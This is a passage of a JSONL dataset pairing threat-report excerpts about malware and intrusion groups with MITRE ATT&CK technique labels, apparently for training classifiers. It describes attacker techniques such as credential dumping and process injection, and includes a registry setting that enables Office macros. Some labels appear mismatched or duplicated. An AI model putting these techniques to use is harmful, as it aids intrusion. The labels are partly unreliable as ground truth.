cleanup, the malware invoked cmd.exe","labels":"['T1059.003']"}
{"text1":"The initial attack did not produce the desired result; The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender\u2019s Real-Time Monitoring feature","labels":"['T1562.001']"}
{"text1":"The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below","labels":"['T1560.003']"}
{"text1":"Since version 0.2.6 This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user\u2019s SID and server password","labels":"['T1558.002']"}
{"text1":"The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page","labels":"['T1201']"}
{"text1":"In addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function","labels":"['T1056.001']"}
{"text1":"After the anti-analysis checks are complete, the loader starts preparing the infected environment for the downloading of additional payloads. There are 3 download attempts (and thus 3 GET requests trailing by a different numeric ID), the payloads are downloaded subsequently to the user\u2019s %temp% folder","labels":"['T1071.001']"}
{"text1":"In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette","labels":"['T1566.002']"}
{"text1":"Putty \u2013 can be leveraged by attackers for remote access, to exfiltrate data and send it back to attackers - PSExec \u2013 is a legitimate Microsoft tool that can be exploited by malicious actors and used for lateral movement across victim networks - SNScan \u2013 this tool can be used for network reconnaissance, to find other potential targets on victim networks - WinRAR \u2013 is an archiving tool that can be used to compress files (potentially to make them easier to send back to attackers) and also to extract files from zipped folders","labels":"['T1046']"}
{"text1":"In order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious payload inside an allowlisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in the memory as they are executed","labels":"['T1055.012']"}
{"text1":"The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. PowerShell downloader The downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. Beginning of the \"download and load\" shellcode The shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code","labels":"['T1027']"}
{"text1":"For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose","labels":"['T1546.003']"}
{"text1":"The communication between the cryptojacking bot and its mining server is made by using the Stratum protocol on port 10001 and is controlled by the execution of the spreadXfghij.exe program","labels":"['T1071']"}
{"text1":"Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection","labels":"['T1489']"}
{"text1":"For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe \/c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http:\/\/<c2 domain>\/resp. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(\"File Uploaded\")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http:\/\/<c2 domain>\/resp. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(\"< File Not Found >\")> If the file exists, the Trojan will read the contents of the specified file and compresses the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data","labels":"['T1560.003']"}
{"text1":"Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time","labels":"['T1059.003']"}
{"text1":"These events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload","labels":"['T1012']"}
{"text1":"This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe","labels":"['T1027']"}
{"text1":"Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe \u2014 a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories","labels":"['T1003.001', 'T1560.001']"}
{"text1":"The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor","labels":"['T1074.001', 'T1119']"}
{"text1":"The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed \u201csnowman\u201d (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim\u2019s host information (System Owner\/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user\u2019s login (Scheduled Task\/Job: Scheduled Task [T1053.005","labels":"['T1053.005', 'T1027']"}
{"text1":"The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved","labels":"['T1027']"}
{"text1":"As mentioned, the registry key (HKLM\\SOFTWARE\\Microsoft\\DRM) is where the malicious payload is stored. In this case, this is the Pillowmint Trojan. Pillowmint is stored and compressed in the registry key","labels":"['T1027']"}
{"text1":"The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory","labels":"['T1027.002', 'T1140', 'T1140']"}
{"text1":"The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \u201cTinymet\u201c. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute","labels":"['T1059.001']"}
{"text1":"TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data","labels":"['T1041']"}
{"text1":"This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables","labels":"['T1055.012']"}
{"text1":"Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple\u2019s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple\u2019s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs","labels":"['T1059.004']"}
{"text1":"IRON TWILIGHT\u2019s email credential targeting system allows the threat group to target and exploit accounts for webmail services such as Gmail and Hotmail, as well as corporate email platforms that use webmail interfaces. When targeting email services that provide alternate methods to authenticate account access, such as Gmail\u2019s use of OAuth, the threat actors may abuse this feature to maintain a persistent session with the compromised account","labels":"['T1566.002']"}
{"text1":"From these web shells, they launched reconnaissance commands, stole data, and dropped additional tools including portqry.exe, renamed cmd.exe, winrar, and the notorious hTran","labels":"['T1105']"}
{"text1":"kaudited \u2014 A file installed as \/usr\/bin\/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions","labels":"['T1547.006']"}
{"text1":"2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page","labels":"['T1059.005']"}
{"text1":"On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. The primary difference was that this sample was encrypted and password protected, requiring the victim to enter in a password which was likely provided by the adversary to view the document. Typically, password protected documents is commonly used by adversaries as an evasion tactic to bypass automated analysis mechanisms due to the password requirement for successful execution. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1204.002']"}
{"text1":"In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload. The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. After the files are dropped, the VMwareCplLauncher.exe executable is run, which in turn loads the vmtools.dll DLL file. This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute. The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past. The flow of execution from the time the victim opens the malicious Microsoft Word document, to the execution of BADNEWS, may be seen below","labels":"['T1053.005', 'T1574.002']"}
{"text1":"NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. This screenshot shows the logs messages during the process injection with the API usage. NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\\Ahnlab\\GoogleUpdate.exe path. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files. NavRAT has support for process injection. By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process","labels":"['T1055']"}
{"text1":"File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes\/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials","labels":"['T1555.003']"}
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. DLL side loading has been used to maintain persistence on the compromised system. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. The server-side component provides a simple graphical user interface for threat actors interacting with web shells. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1105']"}
{"text1":"After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color","labels":"['T1112']"}
{"text1":"Determine whether the victim\u2019s host machine is running Windows with an x86 or x64 architecture. Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine","labels":"['T1082']"}
{"text1":"It was used to overwrite data by the BE2 actor, destroying data stored on hard drives by overwriting file contents. While its use may be intended to cover their tracks, it is heavy handed to use this type of tool to cover one\u2019s tracks in a network. Most likely it is a tool of sabotage, much like the Destover wiper seen on Sony Pictures Entertainment\u2019s networks. Instead of re-using the commercial EldoS RawDisk drivers in their malware, the BE2 developers wrote their own low-level disk and file destruction routines","labels":"['T1485']"}
{"text1":"After successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest","labels":"['T1070']"}
{"text1":"Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file","labels":"['T1074.001']"}
{"text1":"However, what happened was that the actor resized the Certificate Table in the digitally signed \u2018vac.dll\u2019 and inserted their own data in the Certificate Table so it doesn\u2019t affect the digital signature","labels":"['T1553.002']"}
{"text1":"Tomiris is a backdoor written in Go whose role is to continuously query its C2 server for executables to download and execute on the victim system. Before performing any operations, it sleeps for at least nine minutes in a possible attempt to defeat sandbox-based analysis systems","labels":"['T1497.003']"}
{"text1":"The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]\/\/petshopbook[.]com. This script installs a custom Sekur PS stager to %LOCALAPPDATA%\\Microsoft\\WindowsDefender\\ClearTemp.ps1 and establishes persistence for this stager with a second VBS that is launched by a scheduled task","labels":"['T1053.005']"}
{"text1":"We found four different trojaned binaries in use since July 2019. The 5kplayer, driver pack and Firefox trojanized software use a service to achieve persistence. The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware","labels":"['T1562.001']"}
{"text1":"Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe also delivers malicious archives containing CrimsonRAT executables using various themes, including honeytraps. Conclusion . Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites","labels":"['T1189']"}
{"text1":"An interesting fact is that the ransomware enumerates all running processes and compares the hashed name of each process with embedded hash values","labels":"['T1057']"}
{"text1":"Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request","labels":"['T1071.001']"}
{"text1":"The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant","labels":"['T1027']"}
{"text1":"The main function within the ISMInjector assembly uses the Joiner module to construct the final payload and the Inner module to inject the final payload into a process. Figure 4 shows the ISMInjector\u2019s main function that uses the two modules to carry out its injection process before exiting","labels":"['T1055.012']"}
{"text1":"Forensic examination of a computer infected with a banking trojan Oleg Skulkin Senior Digital Forensics Analyst at Group-IB Where did it all start. Since then, phishing emails distributing the trojan have been sent to potential victims with admirable persistence. In this article, I am going to show how to perform forensic analysis of an image of a computer infected with the RTM banking trojan. Let's try to find registry files, such as SOFTWARE, for example. Let's recall Jesse Kornblum's paradox: \"Malware can hide, but it must run\". A good start will be to look for potential persistence mechanisms that can be used by the malware to restart after reboot. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. Let's start with low-hanging fruits, the so-called run keys: The partition was last modified on November 7th, and we see that when a user logs in, the apg.exe file is executed from a very suspicious location. Let's see what else we can find in the b7mg81 directory: TeamViewer. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad","labels":"['T1547.001']"}
{"text1":"The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe","labels":"['T1218.010']"}
{"text1":"Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain","labels":"['T1203']"}
{"text1":"The attacker created password-protected archives on the victims' OWA server so that they could be exfiltrated via a simple HTTP request","labels":"['T1048.002']"}
{"text1":"This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Camouflage and blending into the environment. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services","labels":"['T1036.005']"}
{"text1":"Finally, REvil ransomware marks its binary code for deletion during the next reboot and terminates execution","labels":"['T1070.004']"}
{"text1":"For example, we recently disclosed the activities of one of those teams (dubbed Tsar team) surrounding the use of mobile malware. This team has previously launched campaigns targeting the United States and European intelligence communities, militaries, defense contractors, news organizations, NGOs and multilateral organizations. It has also targeted jihadists and rebels in Chechnya","labels":"['T1027']"}
{"text1":"ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy","labels":"['T1133']"}
{"text1":"Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically \u201crefreshed\u201d their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique","labels":"['T1589.001']"}
{"text1":"Case in point: Last week, we came across a worm (detected by Trend Micro as Worm.Win32.BLADABINDI.AA) that propagates through removable drives and installs a fileless version of the BLADABINDI backdoor","labels":"['T1120']"}
{"text1":"The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators","labels":"['T1047', 'T1074', 'T1018']"}
{"text1":"The core Karagany implant does not delete any of the plugins it downloads, although some of the plugins are designed to self-delete. This oversight facilitates high-fidelity forensic analysis of the majority of plugin activity carried out over the duration of the intrusion and allows a detailed timeline of threat actor activity to be compiled. The malware also creates a directory that is used for storing both plugin output data and to stage data for exfiltration. The ascending numerical value of these directories likely indicates malware versioning","labels":"['T1074.001']"}
{"text1":"The second portion of EnvyScout is a modified version of the open-source tool FileSaver, which is intended to assist in the writing of files to disk via JavaScript. This methodology may circumvent static analysis of known malicious file types by obscuring them within dynamically altered content upon execution","labels":"['T1059.007']"}
{"text1":"It can terminate IDA debugger, x32dbg, OllyDbg and more processes to avoid dynamic analysis, close databases, office programs and security tools","labels":"['T1562.001']"}
{"text1":"OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. In addition to acting as a web shell, the malware captures and DES-encrypts credentials before writing the username and password to disk. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1056.001', 'T1505.003']"}
{"text1":"Linux\/Ebury is noteworthy for multiple reasons. Although this is something common under the Windows operating system, it is the first time we\u2019ve seen a malicious library being used on POSIX systems. Linux\/Ebury also uses innovative tricks to hook functions, discover the address space of the ELF executable that loaded the library and apply patches to its code at runtime. We believe that before using the external library to hook into OpenSSH processes, the author of Linux\/Ebury used a patch to modify the source code of OpenSSH, thereby adding \u201cnew functionalities\u201d to the software. The first variants found were modified binaries left on the disk. We have also seen usage of\u00a0the rpm commands to remove signature from the original OpenSSH packages (openssh-server,\u00a0openssh-clients) and modify the RPM database to update the file hashes with those of the malicious files. This will make the output of\u00a0rpm --verify openssh-servers report the files as unmodified. However, the output from rpm -qi openssh-servers will clearly show the package is missing its signatures","labels":"['T1553.002']"}
{"text1":"The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version","labels":"['T1553.002']"}
{"text1":"Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. It takes no action if the adjustment of the token privileges fails. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process","labels":"['T1134']"}
{"text1":"Each user on a Mac can have a LaunchAgents folder in their own Library folder to specify code that should be run every time that user logs in. We can confirm this is the case with Green Lambert by running the implant, then checking the user\u2019s LaunchAgents folder","labels":"['T1543.001']"}
{"text1":"In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans","labels":"['T1057']"}
{"text1":"The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems","labels":"['T1053.005', 'T1053', 'T1053.005']"}
{"text1":"This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label \"C:\\\" and the computer name. The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string. The main function then calls the subfunction with the argument 3 to get the POST data parameter (\u201cporg\u201d) along with the volume serial number and computer name and will send this data to the C2 via the HTTP POST request. The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \"open\" function using the ShellExecuteW API function. Also, the author capitalized the \u201cE\u201d in the \u201cdde\u201d command to evade case sensitive signatures. Lastly, the author bolded the \u201cdd\u201d characters within the \u201cdde\u201d command, which breaks the string up within the XML of the DOCX file (word\/document.xml) to make signature development difficult, as seen here","labels":"['T1082']"}
{"text1":"The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL","labels":"['T1082']"}
{"text1":"The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines","labels":"['T1552.004']"}
{"text1":"Next, HyperStack uses a custom handshake that is similar to handshakes used for Carbon named-pipe communications. To detect incoming connections from the controller, the HyperStack implant uses the Windows API call \u2018ConnectNamedPipe\u2019. When HyperStack receives an incoming connection, it starts a new thread and continues with the custom handshake. If it matches, the HyperStack implant returns the value CACA05ACCE55F11E to the controller","labels":"['T1106']"}
{"text1":"The document may also display the fake message \u201cThis document is protected\u201d to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system","labels":"['T1204.002']"}
{"text1":"The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware\u2019s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware\u2019s compilation timestamp","labels":"['T1027']"}
{"text1":"GALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it\u2019s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, QuarkBandit is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available Poison Ivy RAT. These RATs and the China Chopper web shell form the basis of GALLIUM\u2019s toolkit for maintaining access to a victim network","labels":"['T1588.002']"}
{"text1":"For Linux Rabbit to establish a connection with the C2 server, it utilizes Tor hidden services to act as contact points to access a Tor gateway. The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter","labels":"['T1132']"}
{"text1":"ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB, HTTP, WCF and RAW Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc. The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified. smbserver.py: A Python implementation of an SMB server","labels":"['T1557.001']"}
{"text1":"Moreover, USBWorm uses an icon that mimics a Windows directory, tricking the user into executing the malware when trying to access a directory","labels":"['T1036.005']"}
{"text1":"A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera","labels":"['T1555.003']"}
{"text1":"In the case of a Linux\/Ebury backdoor connection, the\u00a0<version>\u00a0contains a hexadecimal string of twenty-two (22) characters or more. It embeds an eleven (11) character password that is first encrypted with the client IP address and then encoded as a hexadecimal string; optionally a four (4) byte command may be encrypted and encoded as well after the password","labels":"['T1573.001']"}
{"text1":"Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field","labels":"['T1104']"}
{"text1":"Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool","labels":"['T1573.001']"}
{"text1":"The wrapper JAR file drops a secondary JAR file and copies it to a %Temp% location. The payload JAR file can be extracted using AES decryption. The first 16 bytes in the file \u201ck\u201d seen in Figure 4 contains the key and the file \u201ce\u201d is the encrypted Java payload","labels":"['T1027']"}
{"text1":"29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly","labels":"['T1112']"}
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. Get Microsoft Version Number from the registry, specifically from reg key\/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1112']"}
{"text1":"The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression","labels":"['T1140']"}
